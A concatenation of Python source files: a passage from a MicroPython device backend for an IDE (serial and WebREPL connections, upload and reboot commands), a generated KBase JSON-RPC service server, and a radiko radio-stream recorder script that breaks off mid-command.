self._error = None
def read(self, size, timeout=1):
if timeout == 0:
raise TimeoutError()
timer = TimeHelper(timeout)
while len(self._read_buffer) < size:
self._check_for_error()
try:
self._read_buffer.extend(self._read_queue.get(True, timer.time_left))
except queue.Empty:
raise TimeoutError(
"Reaction timeout. Bytes read: %s" % self._read_buffer
)
try:
data = self._read_buffer[:size]
return data
finally:
del self._read_buffer[:size]
def read_until(self, terminators, timeout=2):
if timeout == 0:
raise TimeoutError()
timer = TimeHelper(timeout)
if not isinstance(terminators, (set, list, tuple)):
terminators = [terminators]
terminator = None
while True:
self._check_for_error()
found = False
for terminator in terminators:
if terminator in self._read_buffer:
found = True
break
if found:
break
try:
data = self._read_queue.get(True, timer.time_left)
assert len(data) > 0
self._read_buffer.extend(data)
except queue.Empty:
raise TimeoutError(
"Reaction timeout. Bytes read: %s" % self._read_buffer
)
assert terminator is not None
size = self._read_buffer.index(terminator) + len(terminator)
try:
data = self._read_buffer[:size]
return data
finally:
del self._read_buffer[:size]
def read_all(self):
while not self._read_queue.empty():
self._read_buffer.extend(self._read_queue.get(True))
if len(self._read_buffer) == 0:
self._check_for_error()
try:
return self._read_buffer
finally:
self._read_buffer = bytearray()
def _check_for_error(self):
if self._error:
raise SerialException("EOF")
def unread(self, data):
self._read_buffer = data + self._read_buffer
def write(self, data, block_size=32, delay=0.01):
raise NotImplementedError()
def _log_data(self, data):
print(
data.decode("Latin-1")
.replace("\r\n", "\n")
.replace("\x01", "①")
.replace("\x02", "②")
.replace("\x03", "③")
.replace("\x04", "④"),
end="",
)
def incoming_is_empty(self):
return self._read_queue.empty() and len(self._read_buffer) == 0
def outgoing_is_empty(self):
return True
def buffers_are_empty(self):
return self.incoming_is_empty() and self.outgoing_is_empty()
def reset_input_buffer(self):
return self.read_all()
def reset_output_buffer(self):
pass
def close(self):
raise NotImplementedError()
class SerialConnection(Connection):
def __init__(self, port, baudrate):
super().__init__()
self._serial = serial.Serial(port, baudrate=baudrate, timeout=None)
self._reading_thread = threading.Thread(target=self._listen_serial, daemon=True)
self._reading_thread.start()
def write(self, data, block_size=32, delay=0.01):
for i in range(0, len(data), block_size):
block = data[i : i + block_size]
# self._log_data(b"[" + block + b"]")
size = self._serial.write(block)
assert size == len(block)
time.sleep(delay)
return len(data)
def _listen_serial(self):
"NB! works in background thread"
try:
while True:
b = self._serial.read(1) # To avoid busy loop
if len(b) == 0:
self._error = "EOF"
# print("LISTEN EOFFFFFFFFFF")
break
data = b + self._serial.read_all()
self.num_bytes_received += len(data)
self._read_queue.put(data)
# self._log_data(data)
except SerialException as e:
logging.exception("Error while reading from serial")
self._error = str("Serial reading error: %s" % e)
def incoming_is_empty(self):
return self._serial.in_waiting == 0 and super().incoming_is_empty()
def outgoing_is_empty(self):
return self._serial.out_waiting == 0
def reset_output_buffer(self):
self._serial.reset_output_buffer()
def close(self):
if self._serial is not None:
try:
self._serial.cancel_read()
self._reading_thread.join()
finally:
try:
self._serial.close()
self._serial = None
except Exception:
logging.exception("Couldn't close serial")
class WebReplConnection(Connection):
def __init__(self, url, password):
super().__init__()
self._url = url
self._password = password
# Some tricks are needed to use async library in sync program
# use thread-safe queues to communicate with async world in another thread
self._write_queue = Queue()
self._connection_result = Queue()
self._ws_thread = threading.Thread(target=self._wrap_ws_main, daemon=True)
self._ws_thread.start()
# Wait until connection was made
res = self._connection_result.get()
if res != "OK":
raise res
def _wrap_ws_main(self):
import asyncio
loop = asyncio.new_event_loop()
loop.set_debug(True)
loop.run_until_complete(self._ws_main())
async def _ws_main(self):
import asyncio
try:
await self._ws_connect()
except Exception as e:
self._connection_result.put_nowait(e)
return
self._connection_result.put_nowait("OK")
await asyncio.gather(self._ws_keep_reading(), self._ws_keep_writing())
async def _ws_connect(self):
import asyncio
import websockets
self._ws = await asyncio.wait_for(
websockets.connect(self._url, ping_interval=None), 3
)
print("GOT WS", self._ws)
# read password prompt and send password
read_chars = ""
while read_chars != "Password: ":
print("prelude", read_chars)
ch = await self._ws.recv()
print("GOT", ch)
read_chars += ch
print("sending password")
await self._ws.send(self._password + "\n")
print("sent password")
async def _ws_keep_reading(self):
while True:
data = (await self._ws.recv()).encode("UTF-8")
print("Read:", repr(data))
if len(data) == 0:
self._error = "EOF"
break
self.num_bytes_received += len(data)
self._read_queue.put(data, block=False)
async def _ws_keep_writing(self):
import asyncio
while True:
while not self._write_queue.empty():
data = self._write_queue.get(block=False).decode("UTF-8")
print("Wrote:", repr(data))
await self._ws.send(data)
# Allow reading loop to progress
await asyncio.sleep(0.01)
def write(self, data, block_size=32, delay=0.01):
self._write_queue.put_nowait(data)
async def _async_close(self):
await self._ws.close()
def close(self):
"""
import asyncio
asyncio.get_event_loop().run_until_complete(self.async_close())
"""
class TimeHelper:
def __init__(self, time_allowed):
self.start_time = time.time()
self.time_allowed = time_allowed
@property
def time_spent(self):
return time.time() - self.start_time
@property
def time_left(self):
return max(self.time_allowed - self.time_spent, 0)
def parse_api_information(file_path):
with tokenize.open(file_path) as fp:
source = fp.read()
tree = ast.parse(source)
defs = {}
# TODO: read also docstrings ?
for toplevel_item in tree.body:
if isinstance(toplevel_item, ast.ClassDef):
class_name = toplevel_item.name
member_names = []
for item in toplevel_item.body:
if isinstance(item, ast.FunctionDef):
member_names.append(item.name)
elif isinstance(item, ast.Assign):
# TODO: check Python 3.4
"TODO: item.targets[0].id"
defs[class_name] = member_names
return defs
def list_serial_ports():
# serial.tools.list_ports.comports() can be too slow
# because os.path.islink can be too slow (https://github.com/pyserial/pyserial/pull/303)
# Workarond: temporally patch os.path.islink
try:
old_islink = os.path.islink
if platform.system() == "Windows":
os.path.islink = lambda _: False
return list(serial.tools.list_ports.comports())
finally:
os.path.islink = old_islink
def add_micropython_backend(name, proxy_class, description, config_page):
get_workbench().set_default(name + ".port", "auto")
get_workbench().set_default(name + ".webrepl_url", DEFAULT_WEBREPL_URL)
get_workbench().set_default(name + ".webrepl_password", "")
get_workbench().add_backend(name, proxy_class, description, config_page)
def load_plugin():
add_micropython_backend(
"GenericMicroPython",
GenericMicroPythonProxy,
"MicroPython on a generic device",
GenericMicroPythonConfigPage,
)
def _upload_as(target_provider_method):
source_path = (
get_workbench().get_editor_notebook().get_current_editor().save_file(False)
)
if source_path is None:
return
proxy = get_runner().get_backend_proxy()
assert isinstance(proxy, MicroPythonProxy)
if os.path.isabs(source_path):
source_path = os.path.relpath(source_path, get_workbench().get_cwd())
target = getattr(proxy, target_provider_method)()
get_shell().submit_magic_command(["%upload", source_path, target])
def _cat(source_provider_method):
proxy = get_runner().get_backend_proxy()
assert isinstance(proxy, MicroPythonProxy)
source = getattr(proxy, source_provider_method)()
get_shell().submit_magic_command(["%cat", source])
def _upload_as_main_script():
_upload_as("_get_main_script_path")
def _upload_as_boot_script():
_upload_as("_get_boot_script_path")
def _upload_script():
_upload_as("_get_script_path")
def _cat_main_script():
_cat("_get_main_script_path")
def _cat_boot_script():
_cat("_get_boot_script_path")
def soft_reboot():
proxy = get_runner().get_backend_proxy()
if hasattr(proxy, "_soft_reboot_and_run_main"):
return proxy._soft_reboot_and_run_main()
return None
def soft_reboot_enabled():
proxy = get_runner().get_backend_proxy()
return (
proxy
and proxy.is_functional()
and hasattr(proxy, "_soft_reboot_and_run_main")
)
def disconnect():
proxy = get_runner().get_backend_proxy()
assert hasattr(proxy, "disconnect")
proxy.disconnect()
def disconnect_enabled():
proxy = get_runner().get_backend_proxy()
return hasattr(proxy, "disconnect")
def file_commands_enabled():
proxy = get_runner().get_backend_proxy()
return (
isinstance(proxy, MicroPythonProxy)
and get_workbench().get_editor_notebook().get_current_editor() is not None
and get_runner().is_waiting_toplevel_command()
)
def select_device():
get_workbench().show_options("Interpreter")
get_workbench().add_command(
"selectdevice", "device", "Select device", select_device, group=1
)
get_workbench().add_command(
"softreboot",
"device",
"Soft reboot",
soft_reboot,
soft_reboot_enabled,
group=100,
default_sequence="<Control-d>",
extra_sequences=["<<CtrlDInText>>"],
)
get_workbench().add_command(
"uploadmainscript",
"device",
"Upload current script as main script",
_upload_as_main_script,
tester=file_commands_enabled,
default_sequence="<Control-u>",
group=20,
)
get_workbench().add_command(
"uploadbootscript",
"device",
"Upload current script as boot script",
_upload_as_boot_script,
tester=file_commands_enabled,
group=20,
)
get_workbench().add_command(
"uploadscript",
"device",
"Upload current script with current name",
_upload_script,
tester=file_commands_enabled,
group=20,
)
get_workbench().add_command(
"catmainscript",
"device",
"Show device's main script",
_cat_main_script,
tester=file_commands_enabled,
group=20,
)
get_workbench().add_command(
"catbootscript",
"device",
"Show device's boot script",
_cat_boot_script,
tester=file_commands_enabled,
group=20,
)
get_workbench().add_command(
"disconnectserial",
"device",
"Close serial connection",
disconnect,
disconnect_enabled,
group=100,
)
|
kb_transytServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kb_transyt.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_transyt'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_transyt.kb_transytImpl import kb_transyt # noqa @IgnorePep8
impl_kb_transyt = kb_transyt(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_transyt'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_transyt.run_transyt,
name='kb_transyt.run_transyt',
types=[dict])
self.method_authentication['kb_transyt.run_transyt'] = 'required' # noqa
self.rpc_service.add(impl_kb_transyt.status,
name='kb_transyt.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_transyt ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
radipy.py
|
import base64
import datetime
import subprocess
import sys
import threading
import time
from pathlib import Path
from xml.etree import ElementTree as ET
import click
import requests
from prettytable import PrettyTable
DATE = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d-%H')
TMP_PATH = Path('./tmp').resolve()
if not TMP_PATH.exists():
print('Create tmp dir. path: {}'.format(str(TMP_PATH)))
TMP_PATH.mkdir(parents=True)
OUTPUT_PATH = Path('./output').resolve()
if not OUTPUT_PATH.exists():
print('Create output dir. path: {}'.format(str(OUTPUT_PATH)))
TMP_PATH.mkdir(parents=True)
PLAYERFILE_PATH = Path(TMP_PATH, 'player.{}.swf'.format(DATE))
KEYFILE_PATH = Path(TMP_PATH, 'authkey.{}.jpg'.format(DATE))
PLAYLISTFILE_PATH = Path(TMP_PATH, 'playlist.{}.m3u8'.format(DATE))
# http://stackoverflow.com/questions/4995733/how-to-create-a-spinning-command-line-cursor-using-pythonのパクリ
class Spinner:
busy = False
delay = 0.5
@staticmethod
def spinning_cursor():
while 1:
for cursor in '|/-\\':
yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay):
self.delay = delay
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def start(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def stop(self):
self.busy = False
time.sleep(self.delay)
class Response(object):
def __init__(self, *args, **kwargs):
for k, v in kwargs.items():
self.__setattr__(k, v)
class Radipy(object):
player_url = 'http://radiko.jp/apps/js/flash/myplayer-release.swf'
fms1_url = 'https://radiko.jp/v2/api/auth1_fms'
fms2_url = 'https://radiko.jp/v2/api/auth2_fms'
LANG = 'ja_JP.utf8'
auth_response = Response()
auth_success_response = Response()
def __init__(self, station_id, ft):
self.station_id = station_id
self.ft = ft
self.partialkey = ''
self.stream_url = ''
self.area_id = ''
self.title = ''
@staticmethod
def clear():
subprocess.call('rm -v {}/*.jpg'.format(TMP_PATH, shell=True))
subprocess.call('rm -v {}/*.swf'.format(TMP_PATH, shell=True))
def authenticate(self):
self._get_playerfile()
self._get_keyfile()
self._get_auth1()
self._generate_partialkey()
self._get_auth2()
print('-' * 20)
print('authentication success.')
def get_channels(self):
self.authenticate()
self._get_area_id()
self._get_area_channels()
def get_programs(self, dt=datetime.datetime.now()):
self.authenticate()
self._get_area_id()
date = datetime.datetime.strftime(dt, '%Y%m%d')
datetime_api_url = 'http://radiko.jp/v3/program/date/{}/{}.xml'.format(date[:8], self.area_id)
res = requests.get(url=datetime_api_url)
channels_xml = res.content
tree = ET.fromstring(channels_xml)
station = tree.find('.//station[@id="{}"]'.format(self.station_id))
progs = station.findall('.//prog')
for prog in progs:
title = prog.find('.//title').text
ft = prog.attrib['ft']
print(ft, title)
def create(self):
self.authenticate()
self._get_area_id()
self._get_stream_url()
spinner = Spinner()
print("Now Downloading...")
spinner.start()
if self._create_aac():
print('finish!!')
else:
print('failed!!')
spinner.stop()
def _get_playerfile(self):
if PLAYERFILE_PATH.exists():
print('playerFile already exists.')
else:
print('create playerFile...')
res = requests.get(self.player_url)
if res.status_code == 200:
with PLAYERFILE_PATH.open('wb') as file:
file.write(res.content)
if not PLAYERFILE_PATH.exists():
print('playerfile is not created.')
exit()
def _get_keyfile(self):
if KEYFILE_PATH.exists():
print('keyfile already exists.')
else:
print('create KeyFile...')
subprocess.call('swfextract -b 12 {} -o {}'.format(PLAYERFILE_PATH, KEYFILE_PATH), shell=True)
if not KEYFILE_PATH.exists():
print('keyfile is not created. confirm swfextract is installed.')
exit()
def _get_auth1(self):
print('access auth1_fms...')
headers = {
'Host': 'radiko.jp',
'pragma': 'no-cache',
'X-Radiko-App': 'pc_ts',
'X-Radiko-App-Version': '4.0.0',
'X-Radiko-User': 'test-stream',
'X-Radiko-Device': 'pc'
}
res = requests.post(url=self.fms1_url, headers=headers)
self.auth_response.body = res.text
self.auth_response.headers = res.headers
self.auth_response.authtoken = self.auth_response.headers['x-radiko-authtoken']
self.auth_response.offset = int(self.auth_response.headers['x-radiko-keyoffset'])
self.auth_response.length = int(self.auth_response.headers['x-radiko-keylength'])
def _generate_partialkey(self):
print('generate particleKey...')
with KEYFILE_PATH.open('rb+') as file:
file.seek(self.auth_response.offset)
data = file.read(self.auth_response.length)
self.partialkey = base64.b64encode(data)
def _get_auth2(self):
print('access auth2_fms...')
headers ={
'pragma': 'no-cache',
'X-Radiko-App': 'pc_ts',
'X-Radiko-App-Version': '4.0.0',
'X-Radiko-User': 'test-stream',
'X-Radiko-Device': 'pc',
'X-Radiko-Authtoken': self.auth_response.authtoken,
'X-Radiko-Partialkey': self.partialkey,
}
res = requests.post(url=self.fms2_url, headers=headers)
self.auth_success_response.body = res.text
self.auth_success_response.headers = res.headers
def _get_area_id(self):
area = self.auth_success_response.body.strip().split(',')
self.area_id = area[0]
print('area_id: {}'.format(self.area_id))
def _get_area_channels(self):
area_api_url = "http://radiko.jp/v3/station/list/{}.xml".format(self.area_id)
res = requests.get(url=area_api_url)
channels_xml = res.content
tree = ET.fromstring(channels_xml)
stations = tree.findall('.//station')
table = PrettyTable(['id', '名前'])
table.align['station_id'] = 'l'
table.align['station_name'] = 'l'
table.padding_width = 2
for station in stations:
row = []
for child in station.iter():
if child.tag in ('id', 'name'):
row.append(child.text)
table.add_row(row)
print(table)
def _get_stream_url(self):
try:
datetime_api_url = 'http://radiko.jp/v3/program/date/{}/{}.xml'.format(self.ft[:8], self.area_id)
res = requests.get(url=datetime_api_url)
channels_xml = res.content
tree = ET.fromstring(channels_xml)
station = tree.find('.//station[@id="{}"]'.format(self.station_id))
prog = station.find('.//prog[@ft="{}"]'.format(self.ft))
to = prog.attrib['to']
# 日を跨いでいる場合は前の日の番組表を探す
except AttributeError:
pre_date = datetime.datetime.strptime(self.ft[:8], '%Y%m%d') - datetime.timedelta(days=1)
datetime_api_url = 'http://radiko.jp/v3/program/date/{}/{}.xml'.format(pre_date.strftime('%Y%m%d'), self.area_id)
res = requests.get(url=datetime_api_url)
channels_xml = res.content
tree = ET.fromstring(channels_xml)
station = tree.find('.//station[@id="{}"]'.format(self.station_id))
prog = station.find('.//prog[@ft="{}"]'.format(self.ft))
to = prog.attrib['to']
self.title = prog.find('.//title').text.replace(' ', '_').replace(' ', '_')
table = PrettyTable(['title'])
table.add_row([self.title])
table.padding_width = 2
print(table)
self.stream_url = 'https://radiko.jp/v2/api/ts/playlist.m3u8?l=15&station_id={}&ft={}&to={}'.format(
self.station_id,
self.ft,
to
)
def _create_aac(self):
try:
program_dir = Path(OUTPUT_PATH, self.title)
if not program_dir.exists():
print('create program dir: {}'.format(program_dir))
program_dir.mkdir()
aac_file = Path(program_dir, '{}_{}.aac'.format(self.title, self.ft[:8]))
cmd = ('ffmpeg '
'-loglevel fatal '
